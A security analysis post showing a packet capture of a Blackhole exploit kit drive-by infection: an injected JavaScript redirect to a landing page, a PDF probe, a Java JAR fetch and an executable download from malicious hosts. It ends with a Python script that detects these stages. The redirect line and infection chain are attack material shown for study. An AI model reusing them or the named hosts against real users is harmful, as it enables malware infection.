Blackhole v1 Exploit Kit – Tries PDF but Exploits Vulnerable Java

June 19, 2015

2012-09-18 22:41:41.081678 IP 192.168.106.131.1325 > 192.168.106.2.53: 35602+ A? arksylhet[.]com. (31)
E..;)………j…j..-.5.’.`………… arksylhet[.]com…..
2012-09-18 22:41:41.212429 IP 192.168.106.2.53 > 192.168.106.131.1325: 35602 1/0/0 A 216.246.98.78 (47)
E..K_……3..j…j..5.-.7………….. arksylhet[.]com……………….bN
2012-09-18 22:41:41.214138 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [S], seq 56424381, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0).@…jk..j…bN…P.\……p… ………..
2012-09-18 22:41:41.417038 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [S.], seq 816984929, ack 56424382, win 64240, options [mss 1460], length 0
E..,_…..t…bN..j..P..0.3a.\..`………..
2012-09-18 22:41:41.417133 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [.], ack 1, win 64240, length 0
E..().@…jr..j…bN…P.\..0.3bP….r..
2012-09-18 22:41:41.418016 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 1:389, ack 1, win 64240, length 388
E…).@…h…j…bN…P.\..0.3bP….8..GET /A67iD4eo/index.html HTTP/1.1
Host: arksylhet[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

2012-09-18 22:41:41.418106 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [.], ack 389, win 64240, length 0
E..(_…..t…bN..j..P..0.3b.\.BP…….
2012-09-18 22:41:41.644235 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [P.], seq 1:509, ack 389, win 64240, length 508
E..$_…..r…bN..j..P..0.3b.\.BP…….HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:53 GMT
Server: Apache
Last-Modified: Tue, 18 Sep 2012 15:53:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

………….
.0.E……2H……B……&5.!.._ol….=p…*..6…..rs.wE.,s
!…….^..&……….i.”…..7>.$F’……xw..W…..Q.qi!….\.. i0a….~P..i…V.,#.z2:..@H%.8.K\……1(e……6_…m.3B….v5.V…
2012-09-18 22:41:41.657446 IP 192.168.106.131.1325 > 192.168.106.2.53: 18706+ A? ankaradellservisi[.]com. (39)
E..C)………j…j..-.5./..I…………ankaradellservisi[.]com…..
2012-09-18 22:41:41.744240 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [P.], seq 1:509, ack 389, win 64240, length 508
E..$_…..r…bN..j..P..0.3b.\.BP…….HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:53 GMT
Server: Apache
Last-Modified: Tue, 18 Sep 2012 15:53:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
2012-09-18 22:41:41.915330 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [P.], seq 1:383, ack 1, win 64240, length 382
E…*.@…>…j.Yj…..P..V.y.N.P…….GET /78gcm6uH/js.js HTTP/1.1
Host: ankaradellservisi[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:41.915419 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [.], ack 383, win 64240, length 0
E..(_…..J.Yj….j..P..y.N…X8P…_…
2012-09-18 22:41:42.000482 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [S.], seq 1489918110, ack 928996081, win 64240, options [mss 1460], length 0
E..,_…….\+lF..j..P..X.X.7_Z.`…_…….
2012-09-18 22:41:42.000671 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [.], ack 1, win 64240, length 0
E..(*.@….#..j.\+lF…P7_Z.X.X.P…w…
2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
E…*.@…….j.\+lF…P7_Z.X.X.P….?..GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:42.001159 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [.], ack 395, win 64240, length 0
E..(_…….\+lF..j..P..X.X.7_\{P…v+..
2012-09-18 22:41:42.067301 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [P.], seq 1:338, ack 383, win 64240, length 337
E..y_…..H.Yj….j..P..y.N…X8P…uW..HTTP/1.1 200 OK
Content-Length: 71
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Sep 2012 15:27:56 GMT
Accept-Ranges: bytes
ETag: "56c7ca2db295cd1:143d0e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Sep 2012 01:39:40 GMT
2012-09-18 22:41:42.074803 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 389:739, ack 509, win 63732, length 350
E…*.@…h…j…bN…P.\.B0.5^P….p..GET /favicon.ico HTTP/1.1
Host: arksylhet[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

2012-09-18 22:41:42.074927 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [.], ack 739, win 64240, length 0
E..(_…..t…bN..j..P..0.5^.\..P…….
2012-09-18 22:41:42.075596 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [S], seq 2894491348, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0* @…….j.E..”…P..n…..p…4………..
2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472
E…_…….\+lF..j..P..X.X.7_\|P…D…HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 19 Sep 2012 02:31:59 GMT
ETag: "894002-47-4ca04cfa1a5c0"
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

document.location='http://69.194.193.34/links/systems-links_warns.php';
2012-09-18 22:41:42.119620 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [R.], seq 396, ack 473, win 0, length 0
E..(*”@…….j.\+lF…P7_\|X.ZwP…o?..
2012-09-18 22:41:42.121447 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iy.y….j..P…….~..`………..
2012-09-18 22:41:42.167256 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [P.], seq 1:338, ack 383, win 64240, length 337
E..y_…..H.Yj….j..P..y.N…X8P…uW..HTTP/1.1 200 OK
Content-Length: 71
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Sep 2012 15:27:56 GMT
Accept-Ranges: bytes
ETag: "56c7ca2db295cd1:143d0e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Sep 2012 01:39:40 GMT
2012-09-18 22:41:43.962836 IP 192.168.106.131.1414 > 69.194.193.34.80: Flags [P.], seq 1:540, ack 1, win 64240, length 539
E..C*@@….d..j.E..”…P.=1.v…P…J:..GET /links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://69.194.193.34/links/systems-links_warns.php

2012-09-18 22:41:43.962905 IP 69.194.193.34.80 > 192.168.106.131.1414: Flags [.], ack 540, win 64240, length 0
E..(_…….E..”..j..P..v….=4.P…….
2012-09-18 22:41:44.025303 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iE.y….j..P…….~..`………..
2012-09-18 22:41:44.038294 IP 69.194.193.34.80 > 192.168.106.131.1413: Flags [P.], seq 27793:27798, ack 450, win 64240, length 5
E..-_…….E..”..j..P..X..&..p.P…0|..0

2012-09-18 22:41:44.038792 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [.], ack 27798, win 63083, length 0
E..(*A@….~..j.E..”…P..p.X..+P..ky#..
2012-09-18 22:41:44.125304 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iC.y….j..P…….~..`………..
2012-09-18 22:41:44.225321 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iB.y….j..P…….~..`………..
2012-09-18 22:41:44.325368 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..iA.y….j..P…….~..`………..
2012-09-18 22:41:44.425376 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,_…..i@.y….j..P…….~..`………..
2012-09-18 22:41:44.472722 IP 69.194.193.34.80 > 192.168.106.131.1414: Flags [P.], seq 1:1261, ack 540, win 64240, length 1260
E…_…….E..”..j..P..v….=4.P…?o..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:41:57 GMT
Content-Type: application/pdf
Connection: keep-alive
Content-Length: 18637
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Accept-Ranges: bytes
Content-Disposition: inline; filename=ef177.pdf
E..,`…..i .y….j..P…….~..`………..
2012-09-18 22:41:45.860721 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [P.], seq 450:800, ack 27798, win 63083, length 350
E…*O@…….j.E..”…P..p.X..+P..k.1..GET /favicon.ico HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

2012-09-18 22:41:45.860850 IP 69.194.193.34.80 > 192.168.106.131.1413: Flags [.], ack 800, win 64240, length 0
E..(`…….E..”..j..P..X..+..q.P…s@..
2012-09-18 22:41:45.898507 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 739:1119, ack 1037, win 63204, length 380
E…*R@…h…j…bN…P.\..0.7nP…,…GET /favicon.ico HTTP/1.1
Host: arksylhet[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
2012-09-18 22:41:47.553965 IP 192.168.106.131.1415 > 69.194.193.34.80: Flags [P.], seq 1:274, ack 1, win 64240, length 273
E..9*a@….M..j.E..”…P.?.GA.*.P…….GET /data/java.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06
Host: 69.194.193.34
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2012-09-18 22:41:47.554073 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [.], ack 274, win 64240, length 0
E..(`…….E..”..j..P..A.*..?.XP….G..
2012-09-18 22:41:47.626406 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`…..i..y….j..P…….~..`………..
2012-09-18 22:41:47.726486 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`…..i..y….j..P…….~..`………..
2012-09-18 22:41:47.826428 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,` ….i..y….j..P…….~..`………..
2012-09-18 22:41:47.926477 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`!….i..y….j..P…….~..`………..
2012-09-18 22:41:48.026539 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`”….h..y….j..P…….~..`………..
2012-09-18 22:41:48.092307 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [P.], seq 1:234, ack 274, win 64240, length 233
E…`#……E..”..j..P..A.*..?.XP…;3..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:01 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 33010
Last-Modified: Tue, 18 Sep 2012 07:17:22 GMT
Accept-Ranges: bytes
2012-09-18 22:41:51.821007 IP 192.168.106.131.1416 > 69.194.193.34.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263
E../*w@….A..j.E..”…P.<..`dv.P…a…GET /links/systems-links_warns.php?vf=0206360203&we=35353306040934370b06&r=02&pj=w&gc=r HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06
Host: 69.194.193.34
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2012-09-18 22:41:51.821113 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [.], ack 264, win 64240, length 0

E..(`l…..SE..”..j..P..`dv.. 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`m….h..y….j..P…….~..`………..
2012-09-18 22:41:51.926647 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`n….h..y….j..P…….~..`………..
2012-09-18 22:41:52.026635 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`o….h..y….j..P…….~..`………..
2012-09-18 22:41:52.126650 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`p….h..y….j..P…….~..`………..
2012-09-18 22:41:52.226674 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`q….h..y….j..P…….~..`………..
2012-09-18 22:41:52.326590 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
E..,`r….h..y….j..P…….~..`………..
2012-09-18 22:41:52.369258 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [P.], seq 1:1461, ack 264, win 64240, length 1460
E…`s……E..”..j..P..`dv..<..P…….HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:05 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 131584
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Pragma: public
Expires: Wed, 19 Sep 2012 02:42:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
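The capture above reads as a chain once the HTTP messages are pulled out of the `tcpdump -A` noise: a compromised site serves `js.js`, which redirects the browser to the kit's `systems-links_warns.php` landing page; a request carrying hex-encoded query values comes back as `application/pdf`; the Java plugin (its own `Java/1.7.0_06` user agent) fetches `/data/java.jar`; and the Java client then receives `contacts.exe` as `application/x-msdownload`. The script below is an added triage example, not code from the original post: it parses that ASCII dump format, pairs requests with responses, and reports those stages. `SAMPLE_DUMP` is a trimmed excerpt of the capture on this page (the binary bytes tcpdump prints before `GET` and `HTTP/1.1` were shortened by hand); all function and pattern names are this example's own.

```python
"""Triage helper for tcpdump -A output of an exploit-kit visit (added example)."""
import re
from dataclasses import dataclass, field

PKT_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP (\S+) > (\S+): Flags")
REQ_RE = re.compile(r"(GET|POST) (\S+) HTTP/1\.[01]")
RESP_RE = re.compile(r"HTTP/1\.[01] (\d{3})")
HDR_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): (.*)$")
JAVA_UA_RE = re.compile(r"^Mozilla/4\.0 \(Windows XP 5\.1\) Java/")   # Java plugin UA seen above
HEX_PARAM_RE = re.compile(r"=[0-9a-f]{10,}(?:&|$)")                   # long hex query values

# Constructed sample: a trimmed excerpt of the capture above, binary prefixes shortened.
SAMPLE_DUMP = r"""
2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
E...*.@.GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13

2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472
E..._...HTTP/1.1 200 OK
Content-Type: application/javascript

document.location='http://69.194.193.34/links/systems-links_warns.php';
2012-09-18 22:41:43.962836 IP 192.168.106.131.1414 > 69.194.193.34.80: Flags [P.], seq 1:540, ack 1, win 64240, length 539
E..C*@@.GET /links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13

2012-09-18 22:41:44.472722 IP 69.194.193.34.80 > 192.168.106.131.1414: Flags [P.], seq 1:1261, ack 540, win 64240, length 1260
E..._...HTTP/1.1 200 OK
Content-Type: application/pdf
Content-Disposition: inline; filename=ef177.pdf
2012-09-18 22:41:47.553965 IP 192.168.106.131.1415 > 69.194.193.34.80: Flags [P.], seq 1:274, ack 1, win 64240, length 273
E..9*a@.GET /data/java.jar HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06
Host: 69.194.193.34

2012-09-18 22:41:48.092307 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [P.], seq 1:234, ack 274, win 64240, length 233
E...`#..HTTP/1.1 200 OK
Content-Type: application/java-archive
2012-09-18 22:41:51.821007 IP 192.168.106.131.1416 > 69.194.193.34.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263
E../*w@.GET /links/systems-links_warns.php?vf=0206360203&we=35353306040934370b06&r=02&pj=w&gc=r HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06
Host: 69.194.193.34

2012-09-18 22:41:52.369258 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [P.], seq 1:1461, ack 264, win 64240, length 1460
E...`s..HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Disposition: attachment; filename="contacts.exe"

MZ......This program cannot be run in DOS mode..
"""


@dataclass
class HttpMessage:
    ts: str
    src: str               # "ip.port" as tcpdump prints it
    dst: str
    kind: str              # "request" or "response"
    start: str             # method for requests, status code for responses
    path: str = ""
    headers: dict = field(default_factory=dict)
    body_hint: str = ""    # first body line: enough to spot a JS redirect or an MZ header


def parse_tcpdump_ascii(text):
    """A packet header starts a new payload; a GET/POST or HTTP/1.x status line
    opens a message, header lines fill it, and the first body line closes it."""
    msgs, pkt, cur, in_body = [], None, None, False
    for line in text.splitlines():
        line = line.rstrip()
        m = PKT_RE.match(line)
        if m:                         # new packet: any unfinished message ends here
            pkt, cur, in_body = m.groups(), None, False
            continue
        if pkt is None:
            continue
        req = REQ_RE.search(line)     # search(): the start line follows binary junk
        resp = None if req else RESP_RE.search(line)
        if req or resp:
            cur = HttpMessage(*pkt, kind="request" if req else "response",
                              start=req.group(1) if req else resp.group(1),
                              path=req.group(2) if req else "")
            msgs.append(cur)
            in_body = False
            continue
        if cur is None:
            continue
        if in_body:
            if line:
                cur.body_hint, cur = line, None
            continue
        if line == "":
            in_body = True
            continue
        h = HDR_RE.match(line)
        if h:
            cur.headers[h.group(1).lower()] = h.group(2)
    return msgs


def pair_exchanges(msgs):
    """Match each response to the latest unanswered request on the reversed flow;
    retransmitted responses (there are several in the capture) find none and drop."""
    pending, exchanges = {}, []
    for m in msgs:
        if m.kind == "request":
            pending[(m.src, m.dst)] = m
        else:
            req = pending.pop((m.dst, m.src), None)
            if req is not None:
                exchanges.append((req, m))
    return exchanges


def find_exploit_kit_stages(exchanges):
    """Return (stage, timestamp, detail) tuples for the chain stages, in capture order."""
    findings = []
    for req, resp in exchanges:
        ua = req.headers.get("user-agent", "")
        host = req.headers.get("host", req.dst)
        ctype = resp.headers.get("content-type", "").lower()
        disp = resp.headers.get("content-disposition", "").lower()
        java = bool(JAVA_UA_RE.match(ua))
        if "javascript" in ctype and "document.location=" in resp.body_hint:
            findings.append(("redirect", req.ts, f"{host}{req.path} -> {resp.body_hint}"))
        elif ctype.startswith("application/pdf") and HEX_PARAM_RE.search(req.path) and not java:
            findings.append(("pdf", req.ts, f"{disp or ctype} from {host} after hex-encoded query"))
        elif java and (req.path.endswith(".jar") or "java-archive" in ctype):
            findings.append(("jar", req.ts, f"Java plugin ({ua.split()[-1]}) fetched {host}{req.path}"))
        elif java and ("x-msdownload" in ctype or (disp.startswith("attachment") and ".exe" in disp)):
            findings.append(("exe", req.ts, f"Java client received executable from {host}: {disp}"))
    return findings


def triage(text):
    """Full pipeline: stage names in the order they appear in the dump."""
    return [f[0] for f in find_exploit_kit_stages(pair_exchanges(parse_tcpdump_ascii(text)))]


if __name__ == "__main__":
    for stage, ts, detail in find_exploit_kit_stages(pair_exchanges(parse_tcpdump_ascii(SAMPLE_DUMP))):
        print(f"{ts} {stage:8s} {detail}")
```

Run it against a real `tcpdump -A` text file by passing the file's contents to `triage` or `find_exploit_kit_stages`. The combination worth alerting on is the order, not any single request: a browser landing on a page with long hex query values, followed within seconds by the Java plugin's own user agent pulling a JAR from the same host and then receiving a `Content-Disposition: attachment` executable. Tune `JAVA_UA_RE` to the Java versions present in your environment; the pattern here matches only the `Java/1.7.0_06` string that appears in this capture.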
